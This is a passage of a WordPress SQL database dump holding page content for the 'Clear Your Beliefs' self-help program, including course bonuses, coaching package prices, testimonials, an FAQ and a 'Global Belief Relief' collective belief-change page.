Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'SK', '', 'inherit', 'open', 'open', '', '2237-autosave-v1', '', '', '2015-08-06 02:32:36', '2015-08-06 07:32:36', '', 2237, 'http://clearyourbeliefs.com/2237-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2242, 2, '2017-03-31 20:13:41', '2017-04-01 01:13:41', '<h1>Add Coaching to Your <em>Clear Your Beliefs</em> Program</h1>\n&nbsp;\n<h2><b>You''ve purchased the Clear Your Beliefs program. Congratulations! Now, get some personal guidance.   </b></h2>\n<b></b>The <strong><em>Clear Your Beliefs</em></strong> program takes you deep inside your own subconscious mind – and this can be tricky territory to traverse. Our <strong><em>Clear Your Beliefs Coaches</em></strong> are highly trained professionals who can walk you through the most difficult terrain, and help you clear whatever is in your way. They can answer your questions, and take you even deeper into your old programming – the beliefs that really hold you back.\n\nWhen you order one of the options below, you''ll get a call from on of our staff, who will interview you about your particular needs for support. We will then search through our list of Certified Coaches, and assign the best one for you, based on you needs, and your location. If at any point that coach isn''t working for you, simply let us know (by writing <a href="mailto:lion@ClearYourBeliefs.com">lion@ClearYourBeliefs.com</a>), and we''ll find a better coach for you.\n<h1>Add 3 hours of Coaching to your Program:  $275. [Value: $450!]</h1>\nThis option provides you with three hours of coaching. You are welcome to use this time at any pace you wish. For example, you can get a half-hour of coaching after each of 6 sessions, or get three one-hour sessions. After you''ve used your 3 hours, your Coach will let you know how to order additional hours at their current rate (the current range is from $125 to $225 per hour).\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Coaching-Upgrade-12-hour-each-week" target="_blank"><button class="btn">Enroll Now</button></a>\n<h1>Add 7 hours of Coaching to your Program:  $540. [Value: $1,050!]</h1>\nThis option provides you with a full hour of coaching for each of your 7 sessions with one of our Certified Clear Your Beliefs Coaches. You are welcome to use the hours at any pace you wish.   After your 7 hours have been used, your Coach will let you know how to order additional hours (the current range is from $125 to $225 per hour).\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Coaching-Upgrade-1-hour-each-week" target="_blank"><button class="btn">Enroll Now</button></a>\n<h1>Clear Your Beliefs Program plus 7 hours of Coaching with Lion Goodman:  $1,225. [Value: $1,750!]</h1>\nYou will receive 7 full hours of coaching with Lion Goodman, creator of the <strong>Clear Your Beliefs program</strong><em>. You are welcome to use the hours at any pace you wish. (After you have used the 7 hours, additional hours are available at the $175 per hour rate when you purchase ten hours in advance for $1,750, or on an hourly basis at $250 per hour.).</em>\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Clear-Your-Beliefs-Program-7-hours-Coaching" target="_blank"><button class="btn">Enroll Now</button></a>\n\n&nbsp;', 'Coaching', '', 'inherit', 'open', 'open', '', '1141-autosave-v1', '', '', '2017-03-31 20:13:41', '2017-04-01 01:13:41', '', 1141, 'http://clearyourbeliefs.com/1141-autosave-v1/', 0, 'revision', '', 0),
(2244, 2, '2016-03-11 15:05:51', '2016-03-11 20:05:51', '<h5 style="text-align: center;"> <strong>Do You Want to Change the World for the Better?</strong></h5>\r\n<h5 style="text-align: center;"><strong>Join us for an experiment in Global Mind Change</strong></h5>\r\n<center><a href="http://clearyourbeliefs.com/wp-content/uploads/2016/03/Global-Belief-Relief-banner1.jpg"><img class="aligncenter size-full wp-image-2260" src="http://clearyourbeliefs.com/wp-content/uploads/2016/03/Global-Belief-Relief-banner1.jpg" alt="Global-Belief-Relief-banner" width="600" height="150" /></a></center>\r\n<h3 style="text-align: center;">Can We Consciously Change Commonly Held Beliefs on a Global Scale?</h3>\r\n&nbsp;\r\n<p style="text-align: left;"><strong>Most people now recognize that negative and limiting beliefs impact our lives</strong>, preventing us from being happy, and interfering with our forward movement toward our goals.  It has also become obvious that old <strong>tribal, cultural, religious and societal beliefs</strong>  are impacting all of us at the collective social, and political level.</p>\r\nFor more than a decade, we have been using an effective methodology for deleting limiting and negative beliefs from the core of the psyche: <strong><em>"Clear Your Beliefs." </em></strong> The process eliminates old beliefs completely – even deeply ingrained beliefs, the ones stored deep in the subconscious mind.  <strong>The CYB process also opens space to consciously choose new, positive, empowering beliefs</strong> that create better experiences, conditions, and success in life.\r\n\r\n<strong>We believe that the same methodology can be used to eliminate collective <em>social and cultural</em> beliefs.</strong>\r\n<h3 style="text-align: center;">Recording of the first Global Belief Relief\r\nApril 6th, 2016<a href="http://bit.ly/P1U5or">\r\n<span style="color: #0000ff;"><strong>on the Gathering for Change Agents\r\n</strong></span>\r\nhttps://s3-us-west-2.amazonaws.com/community-calls/Gathering_20160406.mp3\r\n</a></h3>\r\n<p style="text-align: center;"><span style="color: #993300;">In this social experiment, we gathered together in virtual space to delete the collective belief, <em>"<strong>Women are ''less than'' men</strong>."</em></span></p>\r\nImagine the possibilities: hundreds of people from around the world gather together to shift a commonly held belief that has impacted large numbers of people negatively.  For example, <em>"Women are ''less-than'' men.</em><span style="line-height: 1.5;"><em>” </em> If the Collective Unconscious could be tapped, as we tap into an individual''s Subconscious Mind, we may be able to shift the Collective Mind to believe, <em>“Women are the equal collaborative partners of Men."</em>  New possibilities would certainly open for the individuals involved, and potentially, new possibilities would open at the social level, for the larger whole of society.  </span>\r\n\r\n<span style="line-height: 1.5;">Collective belief change has been a goal of all major social movements, from Gandhi''s<em> "India can be free of British Rule,"</em> to Martin Luther King Jr.''s <em>"I have a dream,"</em> to Kennedy''s <em>"We can land a man on the moon."</em>  Great visionaries bring new beliefs to the masses, and when collective beliefs (memes) change, the world changes.    </span>\r\n\r\nRather than waiting for a leader to shift our collective consciousness, let''s take this task into our own hands. Today.\r\n\r\nGlobal meditation and peace events are now being conducted by groups such as Unify.org and Amplifield.com.  These experiments are focused on expanding possibilities for global peace and harmony.  Lynne McTaggart wrote about collective mind shift in her book,<em> “The Intention Experiment.”</em> David Nichol discusses the possibilities for virtual political change in his book, <em>"Subtle Activism."</em>\r\n\r\nWhat social beliefs would you change?\r\n\r\nImagine changing <em>“War is the only solution to conflict,” to "There are many paths to peace when all people are cared for.</em>\r\n\r\nImagine changing <em>"There are winners and losers,"</em> to <em>"All humans are worthy of respect and care."</em>\r\n\r\nThe actions of a single individual can make a difference, The actions of a small, committed group can make an even bigger difference.  As Margaret Mead said,  <strong><em>"Never doubt that a small group of thoughtful, committed citizens can change the world; indeed, it''s the only thing that ever has. "</em></strong>\r\n\r\n<strong>Join us to test this theory about collective belief change. Let''s find out how big a difference we can make at the global level. Let’s create magic together.</strong>\r\n\r\nOur first <strong>Global Belief Relief</strong> experiment was on <strong>April 6th, 1016</strong>. Listen to the 60-minute experience in collective belief change (link at the top of page).\r\n\r\nSponsored by <em>The Gathering for Change Agents</em>, an initiative of the <em>True Purpose Institute.</em>\r\n\r\n<strong>Founders:</strong>\r\n\r\n<span style="color: #0000ff;"><a style="color: #0000ff;" href="mailto:liongoodman@gmail.com">Lion Goodman</a></span>, Creator of <em><strong>Clear Your Beliefs</strong></em>\r\n\r\nNina Potter, <em>Core Spirit Relationship Coach</em>\r\n\r\nSherri Pula, <em>Director of Training, Clear Your Beliefs</em>\r\n\r\nTo learn more, contact Lion Goodman at liongoodman@gmail.com or by phone: 707-971-7947.\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Global Belief Relief', '', 'publish', 'open', 'open', '', 'global-belief-relief', '', '', '2016-04-14 21:37:46', '2016-04-15 02:37:46', '', 0, 'http://clearyourbeliefs.com/?page_id=2244', 0, 'page', '', 0),
(2245, 2, '2016-04-14 21:37:37', '2016-04-15 02:37:37', '<h5 style="text-align: center;"> <strong>Do You Want to Change the World for the Better?</strong></h5>\n<h5 style="text-align: center;"><strong>Join us for an experiment in Global Mind Change</strong></h5>\n<center><a href="http://clearyourbeliefs.com/wp-content/uploads/2016/03/Global-Belief-Relief-banner1.jpg"><img class="aligncenter size-full wp-image-2260" src="http://clearyourbeliefs.com/wp-content/uploads/2016/03/Global-Belief-Relief-banner1.jpg" alt="Global-Belief-Relief-banner" width="600" height="150" /></a></center>\n<h3 style="text-align: center;">Can We Consciously Change Commonly Held Beliefs on a Global Scale?</h3>\n&nbsp;\n<p style="text-align: left;"><strong>Most people now recognize that negative and limiting beliefs impact our lives</strong>, preventing us from being happy, and interfering with our forward movement toward our goals.  It has also become obvious that old <strong>tribal, cultural, religious and societal beliefs</strong>  are impacting all of us at the collective social, and political level.</p>\nFor more than a decade, we have been using an effective methodology for deleting limiting and negative beliefs from the core of the psyche: <strong><em>"Clear Your Beliefs." </em></strong> The process eliminates old beliefs completely – even deeply ingrained beliefs, the ones stored deep in the subconscious mind.  <strong>The CYB process also opens space to consciously choose new, positive, empowering beliefs</strong> that create better experiences, conditions, and success in life.\n\n<strong>We believe that the same methodology can be used to eliminate collective <em>social and cultural</em> beliefs.</strong>\n<h3 style="text-align: center;">Recording of the first Global Belief Relief\nApril 6th, 2016<a href="http://bit.ly/P1U5or">\n<span style="color: #0000ff;"><strong>on the Gathering ll for Change Agents\n</strong></span>\nhttps://s3-us-west-2.amazonaws.com/community-calls/Gathering_20160406.mp3\n</a></h3>\n<p style="text-align: center;"><span style="color: #993300;">In this social experiment, we gathered together in virtual space to delete the collective belief, <em>"<strong>Women are ''less than'' men</strong>."</em></span></p>\nImagine the possibilities: hundreds of people from around the world gather together to shift a commonly held belief that has impacted large numbers of people negatively.  For example, <em>"Women are ''less-than'' men.</em><span style="line-height: 1.5;"><em>” </em> If the Collective Unconscious could be tapped, as we tap into an individual''s Subconscious Mind, we may be able to shift the Collective Mind to believe, <em>“Women are the equal collaborative partners of Men."</em>  New possibilities would certainly open for the individuals involved, and potentially, new possibilities would open at the social level, for the larger whole of society.  </span>\n\n<span style="line-height: 1.5;">Collective belief change has been a goal of all major social movements, from Gandhi''s<em> "India can be free of British Rule,"</em> to Martin Luther King Jr.''s <em>"I have a dream,"</em> to Kennedy''s <em>"We can land a man on the moon."</em>  Great visionaries bring new beliefs to the masses, and when collective beliefs (memes) change, the world changes.    </span>\n\nRather than waiting for a leader to shift our collective consciousness, let''s take this task into our own hands. Today.\n\nGlobal meditation and peace events are now being conducted by groups such as Unify.org and Amplifield.com.  These experiments are focused on expanding possibilities for global peace and harmony.  Lynne McTaggart wrote about collective mind shift in her book,<em> “The Intention Experiment.”</em> David Nichol discusses the possibilities for virtual political change in his book, <em>"Subtle Activism."</em>\n\nWhat social beliefs would you change?\n\nImagine changing <em>“War is the only solution to conflict,” to "There are many paths to peace when all people are cared for.</em>\n\nImagine changing <em>"There are winners and losers,"</em> to <em>"All humans are worthy of respect and care."</em>\n\nThe actions of a single individual can make a difference, The actions of a small, committed group can make an even bigger difference.  As Margaret Mead said,  <strong><em>"Never doubt that a small group of thoughtful, committed citizens can change the world; indeed, it''s the only thing that ever has. "</em></strong>\n\n<strong>Join us to test this theory about collective belief change. Let''s find out how big a difference we can make at the global level. Let’s create magic together.</strong>\n\nOur first <strong>Global Belief Relief</strong> experiment was on <strong>April 6th, 1016</strong>. Listen to the 60-minute experience in collective belief change (link at the top of page).\n\nSponsored by <em>The Gathering for Change Agents</em>, an initiative of the <em>True Purpose Institute.</em>\n\n<strong>Founders:</strong>\n\n<span style="color: #0000ff;"><a style="color: #0000ff;" href="mailto:liongoodman@gmail.com">Lion Goodman</a></span>, Creator of <em><strong>Clear Your Beliefs</strong></em>\n\nNina Potter, <em>Core Spirit Relationship Coach</em>\n\nSherri Pula, <em>Director of Training, Clear Your Beliefs</em>\n\nTo learn more, contact Lion Goodman at liongoodman@gmail.com or by phone: 707-971-7947.\n\n&nbsp;\n\n&nbsp;', 'Global Belief Relief', '', 'inherit', 'open', 'open', '', '2244-autosave-v1', '', '', '2016-04-14 21:37:37', '2016-04-15 02:37:37', '', 2244, 'http://clearyourbeliefs.com/2244-autosave-v1/', 0, 'revision', '', 0),
(2258, 2, '2016-03-18 12:24:34', '2016-03-18 17:24:34', '', 'Global-Belief-Relief-banner', '', 'inherit', 'open', 'open', '', 'global-belief-relief-banner', '', '', '2016-03-18 12:24:34', '2016-03-18 17:24:34', '', 2244, 'http://clearyourbeliefs.com/wp-content/uploads/2016/03/Global-Belief-Relief-banner.jpg', 0, 'attachment', 'image/jpeg', 0),
(2260, 2, '2016-03-19 22:44:56', '2016-03-20 03:44:56', '', 'Global-Belief-Relief-banner', '', 'inherit', 'open', 'open', '', 'global-belief-relief-banner-2', '', '', '2016-03-19 22:44:56', '2016-03-20 03:44:56', '', 2244, 'http://clearyourbeliefs.com/wp-content/uploads/2016/03/Global-Belief-Relief-banner1.jpg', 0, 'attachment', 'image/jpeg', 0),
(2261, 2, '2016-03-19 22:51:16', '2016-03-20 03:51:16', '', 'studied1-Global-Belief-Relief-sqr', '', 'inherit', 'open', 'open', '', 'studied1-global-belief-relief-sqr', '', '', '2016-03-19 22:51:16', '2016-03-20 03:51:16', '', 2244, 'http://clearyourbeliefs.com/wp-content/uploads/2016/03/studied1-Global-Belief-Relief-sqr.jpg', 0, 'attachment', 'image/jpeg', 0),
(2339, 2, '2016-07-19 21:38:04', '2016-07-20 02:38:04', '<blockquote>\r\n<h1 style="text-align: center;">Empower Your Beliefs!</h1>\r\n<p style="text-align: center;">with</p>\r\n\r\n<h1 style="text-align: center;">MindPT</h1>\r\nA revolutionary way to bring powerful positive messages into your subconscious mind!</blockquote>\r\n&nbsp;', 'Empower Your Beliefs with MindPT', '', 'publish', 'open', 'open', '', 'mindpt', '', '', '2016-07-20 12:42:28', '2016-07-20 17:42:28', '', 0, 'http://clearyourbeliefs.com/?page_id=2339', 0, 'page', '', 0),
